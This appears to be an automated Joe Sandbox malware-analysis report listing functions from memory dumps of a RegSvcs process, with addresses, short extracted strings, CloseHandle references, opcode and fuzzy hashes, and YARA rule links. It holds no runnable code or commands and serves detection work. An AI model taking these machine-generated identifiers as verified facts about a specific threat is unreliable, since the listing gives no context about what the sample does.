Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: xEQ
API String ID: 0-885078744
Opcode ID: 86642c945193aee3e50f23936b9b294ee7d65e0a52904ae03a42bc26cfca7bad
Instruction ID: e2a18de3b85d1fe1c933151cc5de25c2472e0c861aa34f5ba5005c010c585453
Opcode Fuzzy Hash: 86642c945193aee3e50f23936b9b294ee7d65e0a52904ae03a42bc26cfca7bad
Instruction Fuzzy Hash: 9041D371604205DFDB48EF74E8445AD37A2FB91306320856FE402EB25AEF389D0ADF46

Uniqueness

Uniqueness Score: -1.00%

Function 00452270, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 00452387

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 6326e5feef55c65e14cb21d713f1adfc50a5cfa54ec9be975ddd50ad946203dc
Instruction ID: 2101ff746c51954c745d5ee64802a8984e04003dfe414317c5911d9b71969016
Opcode Fuzzy Hash: 6326e5feef55c65e14cb21d713f1adfc50a5cfa54ec9be975ddd50ad946203dc
Instruction Fuzzy Hash: 94415E34A04209DFDB48DFB5C6456BEBBF1BF46301F2080ABD802A7261D7784A49DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045EB88, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

tDur, xrefs: 0045EBDC

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: tDur
API String ID: 0-1590251624
Opcode ID: 5b7bbedf4357cab8218cefb2321ca9954b03ab0f8886b4adfaf09518b3d283ce
Instruction ID: 1aebc659557ac523e8a2c85d8cca5b26bd7e541d232afe9293cfe8dfa6e76383
Opcode Fuzzy Hash: 5b7bbedf4357cab8218cefb2321ca9954b03ab0f8886b4adfaf09518b3d283ce
Instruction Fuzzy Hash: F4315030B003448FCB19DF7985846AEBBF2AF88301B20852ED906A7791DA75DD46DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0045D8D1, Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

trsr, xrefs: 0045D966

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: trsr
API String ID: 0-678784716
Opcode ID: 11cb7b81e75b8dff9c68159ea533a2689628eb310c9ebee331c52c14d67a4cdf
Instruction ID: 21513ade6b76ba9ef57d0729ad982861423ba87c42a95a083672f6d9d263c0dc
Opcode Fuzzy Hash: 11cb7b81e75b8dff9c68159ea533a2689628eb310c9ebee331c52c14d67a4cdf
Instruction Fuzzy Hash: A531C371F046418FCB65AB74E80816EBFA2BF85302714856BD807D77A6DF348846DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00459638, Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

p>Q, xrefs: 004596D1

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: p>Q
API String ID: 0-4128885597
Opcode ID: 4c6ff2dc913e22220f634dc42a1674317f54949bf0848def654a5ee2c961d17e
Instruction ID: 712196fb8c4a07f8e7b390b877280638df84131851309705ab11342b1d301b98
Opcode Fuzzy Hash: 4c6ff2dc913e22220f634dc42a1674317f54949bf0848def654a5ee2c961d17e
Instruction Fuzzy Hash: 7D210730608241DFC7019B64C8A89697FA9EF96306B2542A7DC4AC7253CB799C0DD75B

Uniqueness

Uniqueness Score: -1.00%

Function 00452656, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_4q, xrefs: 00452739

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q
API String ID: 0-3039945896
Opcode ID: 0cc7a8fa4c4d5e57194ec5ea5b25a259be15d7475c9f759cebcf1895884bc174
Instruction ID: a42e1cae316caf7fec418dddae3e09a9e20eb848cd939007524aec8308bcfa08
Opcode Fuzzy Hash: 0cc7a8fa4c4d5e57194ec5ea5b25a259be15d7475c9f759cebcf1895884bc174
Instruction Fuzzy Hash: 9F31AE30E00309CBD714DF22D54475AB7F1BF86319F14C56BC414AB262CBB89989CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00458FC6, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_4q, xrefs: 004590A9

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q
API String ID: 0-3039945896
Opcode ID: 53295c5f997847ed38151fcb954584360cec2b6d06a41312c00675152692fc79
Instruction ID: 08e6ce75ae12355b4f81e8cedb3dbc422d517eb5690f2eb0e0a3c9f1e235f168
Opcode Fuzzy Hash: 53295c5f997847ed38151fcb954584360cec2b6d06a41312c00675152692fc79
Instruction Fuzzy Hash: D5318E30A00749CFDB24EF61D44439EBBF2BF95309F14C56EC405AB265DBB8998ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 004D1530, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004D159C

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cee92f64e9872d490ead63c74464cb10d30ed4429488385678d2453b768ed939
Instruction ID: ace2ea4f792ad3f7720c73b37462cbd6a6acf891808e0e5353f958a922ceb2bb
Opcode Fuzzy Hash: cee92f64e9872d490ead63c74464cb10d30ed4429488385678d2453b768ed939
Instruction Fuzzy Hash: AE21A4725093C05FDB028B25DC54792BFA4EF47324F0980DBDD858F663D2759908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0045D9F0, Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

dVq, xrefs: 0045DA2D

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: 0e4d1f84384300af8c513457bdd5817d69d94dcbce1524fd8444435311c2880c
Instruction ID: d92fbba372a03e583d2b686b72d3fc6cd200e87b72dd08313e281a21031956b5
Opcode Fuzzy Hash: 0e4d1f84384300af8c513457bdd5817d69d94dcbce1524fd8444435311c2880c
Instruction Fuzzy Hash: EC219531C0938ACADF10DFB8C4806EEFBB0BFA9304F14816AD85477246E7B45549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004D01F4, Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004D0264

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0aeffd418bafa6543ad7052f30f566a05d28587f3ede3716b3fdaeec9e448e5c
Instruction ID: d2ab1cbd0c352a6448e1c241bc6c1146ce5fb8b32814ba33d4d4ab8cd67f0beb
Opcode Fuzzy Hash: 0aeffd418bafa6543ad7052f30f566a05d28587f3ede3716b3fdaeec9e448e5c
Instruction Fuzzy Hash: AA21E7719053849FD701CF54DD99B92BFA8EF42320F0885DBED848B653D3349808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004558E0, Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

_,, xrefs: 004558E0

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _,
API String ID: 0-1310867335
Opcode ID: 999d9c0390e264f4f0cc2bcdb2f653e8720bb3d3432b01f4950beb91d92308d4
Instruction ID: 39e7da0d11a61c0cd43b65e11bb6f5aaab6681096b5fefa0530023dd0d5ae8d7
Opcode Fuzzy Hash: 999d9c0390e264f4f0cc2bcdb2f653e8720bb3d3432b01f4950beb91d92308d4
Instruction Fuzzy Hash: 4C11E2B4A00A05DFDB10DF70E456ABE77B2FB45365F20016AE8019A28AD73A9946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0045CDB8, Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

5Q, xrefs: 0045CDEC

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: 5Q
API String ID: 0-1517041480
Opcode ID: 5089e07884900c934e795e73c648af22b66d6f90e4ae6cc2867764667f00cd10
Instruction ID: a1c12c92b0a2a3349e75a9156bdecc2551756017310a36cd13da51e875770b78
Opcode Fuzzy Hash: 5089e07884900c934e795e73c648af22b66d6f90e4ae6cc2867764667f00cd10
Instruction Fuzzy Hash: 5311C130304344CFE714A738D19166DBBD29FD1705324883EE44BAB382DB7AAD4B9B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045E131, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

PUq, xrefs: 0045E160

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: PUq
API String ID: 0-2140217966
Opcode ID: 2614581b433a339c4925f4b569b975763fca489f134ee5282ffe1ca28ae3a4e2
Instruction ID: 703e87c1461b5d7ad951c218e78ed8a088cd0d1048aef3bcf9912b8a1d07a165
Opcode Fuzzy Hash: 2614581b433a339c4925f4b569b975763fca489f134ee5282ffe1ca28ae3a4e2
Instruction Fuzzy Hash: 140126317042109FDB092BB2981412F7BAAFF8A365714447BE806C7393CE799C0687A5

Uniqueness

Uniqueness Score: -1.00%

Function 00455148, Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

\,, xrefs: 00455148

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: \,
API String ID: 0-1695509572
Opcode ID: b540ae75128226189f8849d27f67fff9eae75d104a3097b76ab66636ff534031
Instruction ID: ff6b570b8fc689e7c39d3049c24a095ee9c6ce35ec8b390679957634ef569c48
Opcode Fuzzy Hash: b540ae75128226189f8849d27f67fff9eae75d104a3097b76ab66636ff534031
Instruction Fuzzy Hash: 8C112535E04B048FDB40EAB899656BF7BB0DB85311B20016BDD05E7283EB355A068B9B

Uniqueness

Uniqueness Score: -1.00%

Function 0045E140, Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

PUq, xrefs: 0045E160

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: PUq
API String ID: 0-2140217966
Opcode ID: d2dd9f525dd05e3386d13f6f18ed3606c190c7f3fbfd46f8e9b3f3e998ab6e51
Instruction ID: 4a6ef9c2759a10280c912e83c03de021e1fdd223b601fd2501bde105c4a5099f
Opcode Fuzzy Hash: d2dd9f525dd05e3386d13f6f18ed3606c190c7f3fbfd46f8e9b3f3e998ab6e51
Instruction Fuzzy Hash: D001F2317002149BDB083BB69C1812F769EFB89765720443BE906D3392CE799C0287A5

Uniqueness

Uniqueness Score: -1.00%

Function 0045C991, Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

sQ, xrefs: 0045C9EB

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: sQ
API String ID: 0-4233093067
Opcode ID: 090810f9735b6b0cf9f404de65e84315025eb9f5ba562bc2dd04060b7b0318df
Instruction ID: 578a1008d019bb908da245604961885f2b1e5d66b9d26ec325cd5741ed6f174a
Opcode Fuzzy Hash: 090810f9735b6b0cf9f404de65e84315025eb9f5ba562bc2dd04060b7b0318df
Instruction Fuzzy Hash: EC1149703043A09FC742A734A8947693FE2EB9A711F0401E9E406CB3D6E7744C89CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004578B0, Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

dVq, xrefs: 00457900

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: c586d4a6410aaefc9ebb1e753c50c75c3759fb5639f2690fdba323c80268f1e0
Instruction ID: 395b9456d148f6716b95c5ac9b79eb99aa5f579decfc3f9b93b6d853af000eaa
Opcode Fuzzy Hash: c586d4a6410aaefc9ebb1e753c50c75c3759fb5639f2690fdba323c80268f1e0
Instruction Fuzzy Hash: 89F0447130C2045BE7152A69A800B79378A6BD2720B75066BF819DF2C3CE344D0693B6

Uniqueness

Uniqueness Score: -1.00%

Function 0045A610, Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

dVq, xrefs: 0045A660

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: 422573ecc91bfd227425b9b00ec2210933ec3cb0dcd35204cc8b772ec4fa0dac
Instruction ID: d3804372e850260c4183402d62b092bdc60c3a767cbc0389ceeb302446362a41
Opcode Fuzzy Hash: 422573ecc91bfd227425b9b00ec2210933ec3cb0dcd35204cc8b772ec4fa0dac
Instruction Fuzzy Hash: A4F0AC313082014BD7083A791C50A7D2B862BD1721379036FF8959B3C3CE394C0683A7

Uniqueness

Uniqueness Score: -1.00%

Function 004D156A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004D159C

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c8795917cdefa4486826071ac262750de429afd2bff50df0ed2a2b27596ac16b
Instruction ID: cac68af73601ca67a1ea5af6af86a1b55a33c23f21dc5778f44861733e1d761c
Opcode Fuzzy Hash: c8795917cdefa4486826071ac262750de429afd2bff50df0ed2a2b27596ac16b
Instruction Fuzzy Hash: CE01D475600340AFE710CF15E89476AFB94EB44320F04C0ABDD0A8B712D678E454CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004D0232, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004D0264

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 79dd351e5527444a80cd37e7acd280c1d393787fd55af1e3ddc4bd5d44b5f26a
Instruction ID: 7535787b5dc760d88483f8a74acb14d282416e6d48d6928ca01b8266fb4153f1
Opcode Fuzzy Hash: 79dd351e5527444a80cd37e7acd280c1d393787fd55af1e3ddc4bd5d44b5f26a
Instruction Fuzzy Hash: 89018F759013409FEB10CF15E88976AFB94EF45320F08C4EBDD498B742D679E844DA66

Uniqueness

Uniqueness Score: -1.00%

Function 0045A642, Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

dVq, xrefs: 0045A660

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: c397a5c221b5cad2ec5b1646e7707d25ae4367f2773a1aca15b563d5d9a35402
Instruction ID: d015bc85235a2c6b72b7f9107a8f540eb361f2b264bfc0fb704343abdb9dca70
Opcode Fuzzy Hash: c397a5c221b5cad2ec5b1646e7707d25ae4367f2773a1aca15b563d5d9a35402
Instruction Fuzzy Hash: 2CF0AC313083858BEB046A28644037C77866FC0232379479FDC910F0D3CE798C1A4397

Uniqueness

Uniqueness Score: -1.00%

Function 004578C0, Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

dVq, xrefs: 00457900

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: cf28d81cafbb3269198848cf204783e8432a83f00c62475aa193801a92a96b61
Instruction ID: 26da44b35ee61b871d61a1daf0bc5136c6ecb052ce5fa83efe6ea660459a99a1
Opcode Fuzzy Hash: cf28d81cafbb3269198848cf204783e8432a83f00c62475aa193801a92a96b61
Instruction Fuzzy Hash: 6BF0243130C20443E608396D6840A7D628B6BC1A70370063AF8159B3C6CE354D0653F6

Uniqueness

Uniqueness Score: -1.00%

Function 0045A5B8, Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

(@Q, xrefs: 0045A5D5

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: (@Q
API String ID: 0-621469741
Opcode ID: 36f22933b4bfbfa8f8c4a6b111f46c5be9063d7d5060b585cf460095f1f9b037
Instruction ID: c636d8924207808d024de47beda7025eb64b292ee0a667ed381ef3a38bcfa074
Opcode Fuzzy Hash: 36f22933b4bfbfa8f8c4a6b111f46c5be9063d7d5060b585cf460095f1f9b037
Instruction Fuzzy Hash: 5AF0A0327002049B9718B728E4149AD77E6EBC5325328857DE10ADB341DF3A9E0BAB46

Uniqueness

Uniqueness Score: -1.00%

Function 00458B49, Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

HVq, xrefs: 00458B8B

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: HVq
API String ID: 0-3168765925
Opcode ID: f148ba19f4a86c8abadc7b58090ed9ffbffa720e7412da6f8194c7814a39acb1
Instruction ID: 43666a96e3e8b57ced2a2669c576a200d84f595b44641bad3f31ca225837bc47
Opcode Fuzzy Hash: f148ba19f4a86c8abadc7b58090ed9ffbffa720e7412da6f8194c7814a39acb1
Instruction Fuzzy Hash: CFF02035A082A08FCB5247B4A8285A83BE5DB4979131402AFE882EB753CC654C468B82

Uniqueness

Uniqueness Score: -1.00%

Function 0045EDC8, Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

{,, xrefs: 0045EDF0

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: {,
API String ID: 0-4102919273
Opcode ID: 6551fb677dcc2d42b165d67625c3e38da33e1235f5c5c8a4e22483f3ece66c67
Instruction ID: 8618c0ab00b1659e67a94ed2ba026bc008f9f60d6b4b4b8fd778033d03b7fc64
Opcode Fuzzy Hash: 6551fb677dcc2d42b165d67625c3e38da33e1235f5c5c8a4e22483f3ece66c67
Instruction Fuzzy Hash: 83E0DF313002015B9B28E66AD51196AB3A9CBC2721354887EE80A9B702EF67DE0A8791

Uniqueness

Uniqueness Score: -1.00%

Function 0045EEA8, Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc572cb165aa2c4cddd7cc0f2e318f46af197e1dc7611bba5190a523dc2e1f5
Instruction ID: 0d9de4fa7c521ecf9a393d6d869d79a22a2d4f2ad7cb78494a5955ed4c27fcbc
Opcode Fuzzy Hash: ffc572cb165aa2c4cddd7cc0f2e318f46af197e1dc7611bba5190a523dc2e1f5
Instruction Fuzzy Hash: BAB1A331A04600DFCB29CB69C58466EB7F2BF45302F28847BD8468B293D779EC49CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004563D0, Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391cc759a0ddc12039015bee6d6f16a1f9de7f856589e6ce84c3f1d6e5db3012
Instruction ID: e193c6192b7eef861fd59f92ae484697744c5272a63ce2232064c251b38d2d6b
Opcode Fuzzy Hash: 391cc759a0ddc12039015bee6d6f16a1f9de7f856589e6ce84c3f1d6e5db3012
Instruction Fuzzy Hash: A7916F3190061ACBDF14DF64C890599F3B1BF95304F51C69AC84ABB206EB34EACACF95

Uniqueness

Uniqueness Score: -1.00%

Function 00454F08, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa72c9a539004daedaa3ff32e354262237df59603708ba33c34b5d7554326f02
Instruction ID: cfec9dcfa130a80def73b95c73c791ad7619f51748a1dabc56139a695f09e20b
Opcode Fuzzy Hash: fa72c9a539004daedaa3ff32e354262237df59603708ba33c34b5d7554326f02
Instruction Fuzzy Hash: 2D6138356046058FCB04EB74D46497E77B2EFC5315720896BD8068B29BDB38EC4AC7D6

Uniqueness

Uniqueness Score: -1.00%

Function 0045F238, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ebe5442e2d9bb9fd57ea4c84d66ccf2eb8aa1103eb4ec23c87b1d5e2bea064
Instruction ID: 2a1fbdd1c84c6003b913378dfe1266d3a15664219386e58ea5763ae844e7c2bc
Opcode Fuzzy Hash: 08ebe5442e2d9bb9fd57ea4c84d66ccf2eb8aa1103eb4ec23c87b1d5e2bea064
Instruction Fuzzy Hash: 99717E34A00204CFDB14DF64C484AAEB7F1BF58315F24946AD816A7762CB34EC8EDB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004509A5, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b4bc42d35b3135812d05369f84784d1b44cd7dd1f9445c8cc441c6c8c1fd2a
Instruction ID: 2ce21136a082272262bbfe316275729eb5aafa3a6e75f00591d0374e44dcf207
Opcode Fuzzy Hash: 28b4bc42d35b3135812d05369f84784d1b44cd7dd1f9445c8cc441c6c8c1fd2a
Instruction Fuzzy Hash: 21511735F00305DFCB14ABB4C89566EB7B2FF94305F20866AE8469B351DB34AD06CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004563A1, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5cf057e8246a8027bf0340a703f36428b904a53de9f921357ab712c48108558
Instruction ID: 6a0803950bc71239173c3d926cc3b04bc696425a2f537fa9fc5abc12559c4de9
Opcode Fuzzy Hash: b5cf057e8246a8027bf0340a703f36428b904a53de9f921357ab712c48108558
Instruction Fuzzy Hash: 68513C31900A1ACADB15DF64C8906D9F7B1BF95304F51C69AD8497B212EB70AACACF80

Uniqueness

Uniqueness Score: -1.00%

Function 00457A28, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4b77df2064421b3bacea7d5cac313c751be91a21d9e629130679cee54d94e9
Instruction ID: 6beaf69666f1ffbd72534d03b2f7d51823ede7b6d50a72576f01bff3f8a125f2
Opcode Fuzzy Hash: 8a4b77df2064421b3bacea7d5cac313c751be91a21d9e629130679cee54d94e9
Instruction Fuzzy Hash: 7841693190461ACBDF10DF24C8546DEB7B2AF85305F1184A9D909BB216DBB07B8ACFC1

Uniqueness

Uniqueness Score: -1.00%

Function 00457F38, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfc399ed7230b3bb0a633dbf1c1cd5233b65db88cfb3b98676ba1b451556116
Instruction ID: b977b5b9c56c6d3168d2c535df08ab971bfd7262f09759145b758ca1dd1f0b92
Opcode Fuzzy Hash: 8bfc399ed7230b3bb0a633dbf1c1cd5233b65db88cfb3b98676ba1b451556116
Instruction Fuzzy Hash: FC614374D00618CFCB14DFA8C98469DBBF0FF48311F20866AD85AB7295EB31694ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 004588B8, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd7077df068845eacab863248365b6c64d8d392068623566a4310952b0a5625
Instruction ID: 640142e130be0f941b423500728405cd0e2dc3d5021ef2ea371884aafdf970f8
Opcode Fuzzy Hash: 5fd7077df068845eacab863248365b6c64d8d392068623566a4310952b0a5625
Instruction Fuzzy Hash: E741D27160410ADFCB04DFA8D4449BEF7B1FB84316F20866BD915AB252DF34A81ACB97

Uniqueness

Uniqueness Score: -1.00%

Function 00450BD8, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

